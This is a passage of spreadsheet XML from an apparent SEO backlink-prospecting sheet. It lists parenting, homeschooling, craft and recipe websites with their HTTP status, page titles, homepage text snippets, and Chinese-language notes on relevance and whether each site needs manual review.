      <x:c r="A533" s="18" t="str">
        <x:v>532</x:v>
      </x:c>
      <x:c r="B533" s="19" t="str">
        <x:v>tfhsm.com</x:v>
      </x:c>
      <x:c r="C533" s="19" t="str">
        <x:v>https://tfhsm.com</x:v>
      </x:c>
      <x:c r="D533" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E533" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F533" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G533" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H533" s="19" t="str">
        <x:v>https://www.tfhsm.com/</x:v>
      </x:c>
      <x:c r="I533" s="19" t="str">
        <x:v>The Frugal Homeschooling Mom | Lessons and Resources for Homeschooling Parents - Free Homeschooling | The Frugal Homeschooling Mom</x:v>
      </x:c>
      <x:c r="J533" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K533" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L533" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M533" s="19" t="str">
        <x:v>https://www.tfhsm.com/</x:v>
      </x:c>
      <x:c r="N533" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O533" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P533" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q533" s="21" t="str">
        <x:v>Plan your homeschool year with confidence! Grab our FREE Homeschool Planner to keep your lessons, schedule, and homeschool days organized. Click Here to Grab Your Copy! Find what You Need on the frugal homeschooling site TFHSM loves to share teaching ideas, ways to save, hands-on activities, and resources that help homeschooling moms plan engaging and The Frugal Homeschooling Mom | Lessons and Resources for Homeschooling Parents - Free Homeschooling | The Frugal Homeschooling Mom Skip to content FREE HOMESCHOOL PANNER HERE –&gt; GRAB IT HERE! Search × Facebook Pinterest Instagram HOME BLOG ABOUT shop FREEBIES Contact Plan your homeschool year with confidence! Grab our FREE Homeschool Planner to keep your lessons, schedule, and homeschool days organized. Click Here to Grab Your Copy! Find what You Need on the frugal homeschooling site TFHSM loves to share teaching ideas, ways to save, hands-on activities, and resources that help homeschooling moms plan engaging and fun lessons for kids of all ages. Look below for quick links to help you find </x:v>
      </x:c>
      <x:c r="R533" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S533" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T533" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://tfhsm.com</x:v>
      </x:c>
    </x:row>
    <x:row r="534">
      <x:c r="A534" s="18" t="str">
        <x:v>533</x:v>
      </x:c>
      <x:c r="B534" s="19" t="str">
        <x:v>dulceny.com</x:v>
      </x:c>
      <x:c r="C534" s="19" t="str">
        <x:v>https://dulceny.com</x:v>
      </x:c>
      <x:c r="D534" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E534" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F534" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G534" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H534" s="19" t="str">
        <x:v>https://dulceny.com/</x:v>
      </x:c>
      <x:c r="I534" s="19" t="str">
        <x:v>Shop Cabinet Door Organizers &amp;ndash; Dulceny</x:v>
      </x:c>
      <x:c r="J534" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K534" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L534" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M534" s="19" t="str">
        <x:v>https://dulceny.com/</x:v>
      </x:c>
      <x:c r="N534" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O534" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P534" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q534" s="21" t="str">
        <x:v>Discover Cabinet Door Organizers at a great price. Our Kitchen Storage Organization category offers a great selection of Cabinet Door Organizers and more. Shop Cabinet Door Organizers &amp;ndash; Dulceny Skip to content Submit Close search Blog Best Cabinet Door Organizers expand collapse Best Cabinet Door Organizers Reviews of Cabinet Door Organizers Best Cabinet Door Organizers Products expand collapse Products Cabinet Door Organizers FAQ Blog Best Cabinet Door Organizers Reviews of Cabinet Door Organizers Best Cabinet Door Organizers Products Cabinet Door Organizers FAQ Submit Search expand/collapse Save 33% Dulceny Over-the-Cabinet Kitchen Dish Towel Bar Holder Sturdy metal construction Hangs over cabinet... Regular price $18.00 $11.95 Save 30% Dulceny Modern Metal Kitchen Storage Over Cabinet Curved Towel Bar - Hang on Inside or Outside of Do</x:v>
      </x:c>
      <x:c r="R534" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S534" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T534" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://dulceny.com</x:v>
      </x:c>
    </x:row>
    <x:row r="535">
      <x:c r="A535" s="18" t="str">
        <x:v>534</x:v>
      </x:c>
      <x:c r="B535" s="19" t="str">
        <x:v>mairiedepreuxausart.fr</x:v>
      </x:c>
      <x:c r="C535" s="19" t="str">
        <x:v>https://mairiedepreuxausart.fr</x:v>
      </x:c>
      <x:c r="D535" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E535" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F535" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G535" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H535" s="19" t="str">
        <x:v>https://mairiedepreuxausart.fr/</x:v>
      </x:c>
      <x:c r="I535" s="19" t="str"/>
      <x:c r="J535" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K535" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L535" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M535" s="19" t="str">
        <x:v>https://mairiedepreuxausart.fr/</x:v>
      </x:c>
      <x:c r="N535" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O535" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P535" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q535" s="21" t="str"/>
      <x:c r="R535" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S535" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T535" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://mairiedepreuxausart.fr</x:v>
      </x:c>
    </x:row>
    <x:row r="536">
      <x:c r="A536" s="18" t="str">
        <x:v>535</x:v>
      </x:c>
      <x:c r="B536" s="19" t="str">
        <x:v>gatheringbeauty.com</x:v>
      </x:c>
      <x:c r="C536" s="19" t="str">
        <x:v>https://gatheringbeauty.com</x:v>
      </x:c>
      <x:c r="D536" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E536" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F536" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G536" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H536" s="19" t="str">
        <x:v>https://www.gatheringbeauty.com/</x:v>
      </x:c>
      <x:c r="I536" s="19" t="str">
        <x:v>Gathering Beauty</x:v>
      </x:c>
      <x:c r="J536" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K536" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L536" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M536" s="19" t="str">
        <x:v>https://www.gatheringbeauty.com/</x:v>
      </x:c>
      <x:c r="N536" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O536" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P536" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q536" s="21" t="str">
        <x:v>Gathering Beauty is a DIY, craft blog with a love for all things paper. Here you Gathering Beauty Gathering Beauty HOME BLOG ORIGAMI AIR DRY CLAY PRINTABLES DIY GIFT BOXES PAPER CRAFTS HOLIDAY CRAFTS VALENTINES ST. PATRICK'S DAY Mother's Day Crafts EASTER CRAFTS Father's Day Crafts HALLOWEEN CHRISTMAS SHOP HOME / BLOG / ORIGAMI / AIR DRY CLAY / PRINTABLES / DIY GIFT BOXES / PAPER CRAFTS / HOLIDAY CRAFTS / VALENTINES ST. PATRICK'S DAY Mother's Day Crafts EASTER CRAFTS Father's Day Crafts HALLOWEEN CHRISTMAS SHOP / HOME Gathering Beauty is a DIY, craft blog with a love for all things paper. Here you'll find origami, papercrafts, air dry clay projects as well as the odd crochet or weaving tutorials. HOME / BLOG / ORIGAMI / AIR DRY CLAY / PRINTABLES / DIY GIFT BOXES / PAPER </x:v>
      </x:c>
      <x:c r="R536" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S536" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T536" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://gatheringbeauty.com</x:v>
      </x:c>
    </x:row>
    <x:row r="537">
      <x:c r="A537" s="18" t="str">
        <x:v>536</x:v>
      </x:c>
      <x:c r="B537" s="19" t="str">
        <x:v>mummyvswork.co.uk</x:v>
      </x:c>
      <x:c r="C537" s="19" t="str">
        <x:v>https://mummyvswork.co.uk</x:v>
      </x:c>
      <x:c r="D537" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E537" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F537" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G537" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H537" s="19" t="str">
        <x:v>https://mummyvswork.co.uk/</x:v>
      </x:c>
      <x:c r="I537" s="19" t="str">
        <x:v>- Mummy Vs Work</x:v>
      </x:c>
      <x:c r="J537" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K537" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L537" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M537" s="19" t="str">
        <x:v>https://mummyvswork.co.uk/</x:v>
      </x:c>
      <x:c r="N537" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O537" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P537" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q537" s="21" t="str">
        <x:v>In this corner of the internet, we document our journey of: - Mummy Vs Work Skip to content Get our recipes in your inbox! Sign up Trending: Outgrowing our family home Mummy Vs Work Home Work with us! About Privacy Policy Disclosure Contact Us Prize Draws Past Competitions Mummy Vs Work From wanderlust to dream home designs, and kitchen adventures to precious family moments &amp;mdash; we&amp;rsquo;re embracing life&amp;rsquo;s beautiful chaos. In this corner of the internet, we document our journey of: Building our dream home, step by step Creating memories through world travels Sharing delicious, wholesome recipes Capturing those fleeting family moments Because even when days blur together, every moment counts. What can I help you find? Free Printables Print a</x:v>
      </x:c>
      <x:c r="R537" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S537" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T537" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://mummyvswork.co.uk</x:v>
      </x:c>
    </x:row>
    <x:row r="538">
      <x:c r="A538" s="18" t="str">
        <x:v>537</x:v>
      </x:c>
      <x:c r="B538" s="19" t="str">
        <x:v>motivationformom.com</x:v>
      </x:c>
      <x:c r="C538" s="19" t="str">
        <x:v>https://motivationformom.com</x:v>
      </x:c>
      <x:c r="D538" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E538" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F538" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G538" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H538" s="19" t="str">
        <x:v>https://www.motivationformom.com/</x:v>
      </x:c>
      <x:c r="I538" s="19" t="str">
        <x:v>Motivation for Mom &amp;ndash; Motherhood, Marriage &amp; More</x:v>
      </x:c>
      <x:c r="J538" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K538" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L538" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M538" s="19" t="str">
        <x:v>https://www.motivationformom.com/</x:v>
      </x:c>
      <x:c r="N538" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O538" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P538" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q538" s="21" t="str">
        <x:v>Motherhood, Marriage &amp; More Motivation for Mom &amp;ndash; Motherhood, Marriage &amp; More Skip to content Motivation for Mom Motherhood, Marriage &amp; More Search &amp;hellip; Home Kids &amp; Parenting Mom Motivation Pregnancy &amp; Preparation Life with Baby Breastfeeding Toddlerhood Marriage Recipes Printables Kids Chore Chart for All Ages – Printable Responsibility Chart FREE Big Kid Responsibility Chart – Ages 2-6 The Ultimate Printable Pregnancy Planner for Expecting Moms FREE New Baby Checklist! Printable! FREE Meal Planning and Grocery List Printable First Day of School Sign – Printable and Reusable! I SPY ABC Printable Worksheets for Kids Is Your Child Ready for Kindergarten – Printable Checklist Holidays 100+ Christmas Gift Ideas f</x:v>
      </x:c>
      <x:c r="R538" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S538" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T538" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://motivationformom.com</x:v>
      </x:c>
    </x:row>
    <x:row r="539">
      <x:c r="A539" s="18" t="str">
        <x:v>538</x:v>
      </x:c>
      <x:c r="B539" s="19" t="str">
        <x:v>thestressfreechristmas.com</x:v>
      </x:c>
      <x:c r="C539" s="19" t="str">
        <x:v>https://thestressfreechristmas.com</x:v>
      </x:c>
      <x:c r="D539" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E539" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F539" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G539" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H539" s="19" t="str">
        <x:v>https://thestressfreechristmas.com/</x:v>
      </x:c>
      <x:c r="I539" s="19" t="str">
        <x:v>The Stress-Free Christmas</x:v>
      </x:c>
      <x:c r="J539" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K539" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L539" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M539" s="19" t="str">
        <x:v>https://thestressfreechristmas.com/</x:v>
      </x:c>
      <x:c r="N539" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O539" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P539" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q539" s="21" t="str">
        <x:v>Stop having a stressful holiday season and make it magical again. You'll find everything you need for the perfect Christmas! The Stress-Free Christmas Skip to primary navigation Skip to main content The Stress-Free Christmas Creating a Magical Christmas Start Here About Privacy Policy Contact Virtual Christmas Market Holiday Fun Holiday Fun Recipes Planning Planning Gifts Frugal Shop Search this website Go – Christmas Fun – 30 Day Christmas Savings Challenge Homemade Dog Treats Christmas Gift 2026 Hallmark Christmas Movies The Complete List Hallmark Christmas Movies (2000-2026) How Many Days Until Christmas 2026? Honest Hernest CastGlow Christmas Tree Review Christmas Gift Ideas 5 Early Christmas Shopping Tips and Gift Ideas The Ultimate Small Business Christmas Gift Guide DIY Gifts for Dad The Stress-Free Christm</x:v>
      </x:c>
      <x:c r="R539" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S539" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T539" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://thestressfreechristmas.com</x:v>
      </x:c>
    </x:row>
    <x:row r="540">
      <x:c r="A540" s="18" t="str">
        <x:v>539</x:v>
      </x:c>
      <x:c r="B540" s="19" t="str">
        <x:v>plancreatives.com</x:v>
      </x:c>
      <x:c r="C540" s="19" t="str">
        <x:v>https://plancreatives.com</x:v>
      </x:c>
      <x:c r="D540" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E540" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F540" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G540" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H540" s="19" t="str">
        <x:v>https://plancreatives.com/</x:v>
      </x:c>
      <x:c r="I540" s="19" t="str">
        <x:v>Home - Party Planning and Party Decor Ideas Blog -</x:v>
      </x:c>
      <x:c r="J540" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K540" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L540" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M540" s="19" t="str">
        <x:v>https://plancreatives.com/</x:v>
      </x:c>
      <x:c r="N540" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O540" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P540" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q540" s="21" t="str">
        <x:v>CREATIVITY IS VERY messy, AND I AM VERY creative Home - Party Planning and Party Decor Ideas Blog - Skip to content Grab a copy of our FREE COLORING EBOOK! About Contact The Index Home Party Decor Printables Music Fairytale Animals Seasonal Candy and Sweets Nature Electronics Search for: FREE RECIPE EBOOK! Get your copy! &gt; PARTY DECOR PARTY PLANNING PRINTABLES CREATIVITY IS VERY messy , AND I AM VERY creative Animal Fairytale Seasonal Candy &amp; Sweets Music Electronics Grab your Free copy Get a Squeeze of Citrusy Delights in Your Inbox Join our newsletter and receive a zestful package of 10 reader fav 30-minute recipes, guaranteed to add a burst of flavor to your culinary adventures. Sign up now and let the lemony goodness flow straight to y</x:v>
      </x:c>
      <x:c r="R540" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S540" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T540" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://plancreatives.com</x:v>
      </x:c>
    </x:row>
    <x:row r="541">
      <x:c r="A541" s="18" t="str">
        <x:v>540</x:v>
      </x:c>
      <x:c r="B541" s="19" t="str">
        <x:v>cannibalnyc.com</x:v>
      </x:c>
      <x:c r="C541" s="19" t="str">
        <x:v>https://cannibalnyc.com</x:v>
      </x:c>
      <x:c r="D541" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E541" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F541" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G541" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H541" s="19" t="str">
        <x:v>https://www.cannibalnyc.com/</x:v>
      </x:c>
      <x:c r="I541" s="19" t="str">
        <x:v>Home - Cannibal NYC</x:v>
      </x:c>
      <x:c r="J541" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K541" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L541" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M541" s="19" t="str">
        <x:v>https://www.cannibalnyc.com/</x:v>
      </x:c>
      <x:c r="N541" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O541" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P541" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q541" s="21" t="str">
        <x:v>Category Home - Cannibal NYC Skip to content Menu Home Recipes Crockpot Soup Appetizers Seafood Breakfast Dinner Desserts Fashion Beauty Holidays Interiors 24 Delicious Zucchini and Mushroom Recipes for Every Occasion Dinner 17 Delicious Russian Dessert Recipes Traditional Desserts and Baking 22 Focaccia Recipes That Will Make Your Taste Buds Sing! Appetizers , Dinner , Recipes 22 Chicken Seasoning Recipes: Shake Up Your Taste Buds! Dinner , Recipes Categories Select Category Appetizers Beauty Breakfast Brunch Crockpot Desserts and Baking Dinner Fashion Holidays Interiors Other Recipes Recipes Seafood Soup Latest Recipes 11 Group Dinner Recipes Thatll Make Your Squad Drool! Dinner , Recipes 16 Beginn</x:v>
      </x:c>
      <x:c r="R541" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S541" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T541" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://cannibalnyc.com</x:v>
      </x:c>
    </x:row>
    <x:row r="542">
      <x:c r="A542" s="18" t="str">
        <x:v>541</x:v>
      </x:c>
      <x:c r="B542" s="19" t="str">
        <x:v>cleverlittlepumpkins.com</x:v>
      </x:c>
      <x:c r="C542" s="19" t="str">
        <x:v>https://cleverlittlepumpkins.com</x:v>
      </x:c>
      <x:c r="D542" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E542" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F542" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G542" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H542" s="19" t="str">
        <x:v>https://cleverlittlepumpkins.com/</x:v>
      </x:c>
      <x:c r="I542" s="19" t="str">
        <x:v>Home -</x:v>
      </x:c>
      <x:c r="J542" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K542" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L542" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M542" s="19" t="str">
        <x:v>https://cleverlittlepumpkins.com/</x:v>
      </x:c>
      <x:c r="N542" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O542" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P542" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q542" s="21" t="str">
        <x:v>Home - Skip to content Trending Post : Free Coloring Pages Home Crafts Crafts NATURE CRAFTS RECYCLE CRAFTS Valentines Day Christmas 4th of July Seasonal Posts Winter Summer Fall Spring Coloring Pages Recipes Round Ups About Get Ready for Your Next Fun Project! Seasonal crafts, recipes, activities, and so much more. Recipes Yummy Treats Seasonal Craft s Lot’s of Projects Round Ups Free coloring Color Fun Projects Play Dough Recipe Christmas Coloring Cake Pop Recipe Spring Activities Mermaid Coloring Scavenger Hunt DIY Ornaments Summer Craft Ideas Lantern Craft All the latest posts 30 Unique Fall Nail Ideas 12 Fun Beach Crafts For Kids Summer Dessert Ideas Instant Pudding Dirt Cup Dessert Ulti</x:v>
      </x:c>
      <x:c r="R542" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S542" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T542" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://cleverlittlepumpkins.com</x:v>
      </x:c>
    </x:row>
    <x:row r="543">
      <x:c r="A543" s="18" t="str">
        <x:v>542</x:v>
      </x:c>
      <x:c r="B543" s="19" t="str">
        <x:v>thewildwest3.com</x:v>
      </x:c>
      <x:c r="C543" s="19" t="str">
        <x:v>https://thewildwest3.com</x:v>
      </x:c>
      <x:c r="D543" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E543" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F543" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G543" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H543" s="19" t="str">
        <x:v>https://www.thewildwest3.com/</x:v>
      </x:c>
      <x:c r="I543" s="19" t="str">
        <x:v>The Wild, Wild West Parenting &amp; Teaching Blog – When you're raising three boys, anything goes...</x:v>
      </x:c>
      <x:c r="J543" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K543" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L543" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M543" s="19" t="str">
        <x:v>https://www.thewildwest3.com/</x:v>
      </x:c>
      <x:c r="N543" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O543" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P543" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q543" s="21" t="str">
        <x:v>Honest, sarcastic, hilarious take on motherhood from a mom of three boys – baby, preschool, and grade school. From the daily grind, bathing, and makeup to relationships with partner, friends, and grandparents- this site will help you laugh through it all. The Wild, Wild West Parenting &amp; Teaching Blog – When you're raising three boys, anything goes... Skip to content SEARCH Snarky Parenting Humor Funny Parenting Memes Sincere Parenting Reflections SuperMom &amp; SuperTeacher Ideas Kids Crafts &amp; Activities Holidays with Kids Christmas Halloween Easter New Year’s Thanksgiving Valentine’s Day Mother’s Day Learning and Literacy About Get In Touch &amp; Stay In Touch! Privacy, Disclosures, &amp; Disclaimers Resource Library SEARCH Holidays with Kids | Kids Crafts &amp; Activities St. Patrick’s Day Coloring And Cutting Activity Printable By Charissa @ The Wild, Wild West March 2, 2023 This St. Patrick’s Day Coloring and Cutting activity is perfect for fine motor pr</x:v>
      </x:c>
      <x:c r="R543" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S543" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T543" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://thewildwest3.com</x:v>
      </x:c>
    </x:row>
    <x:row r="544">
      <x:c r="A544" s="18" t="str">
        <x:v>543</x:v>
      </x:c>
      <x:c r="B544" s="19" t="str">
        <x:v>huihangda.com</x:v>
      </x:c>
      <x:c r="C544" s="19" t="str">
        <x:v>https://huihangda.com</x:v>
      </x:c>
      <x:c r="D544" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E544" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F544" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G544" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H544" s="19" t="str">
        <x:v>http://www.huihangda.com/</x:v>
      </x:c>
      <x:c r="I544" s="19" t="str"/>
      <x:c r="J544" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K544" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L544" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M544" s="19" t="str">
        <x:v>http://www.huihangda.com/</x:v>
      </x:c>
      <x:c r="N544" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O544" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P544" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q544" s="21" t="str">
        <x:v>Please click here if the page does not redirect automatically ...</x:v>
      </x:c>
      <x:c r="R544" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S544" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
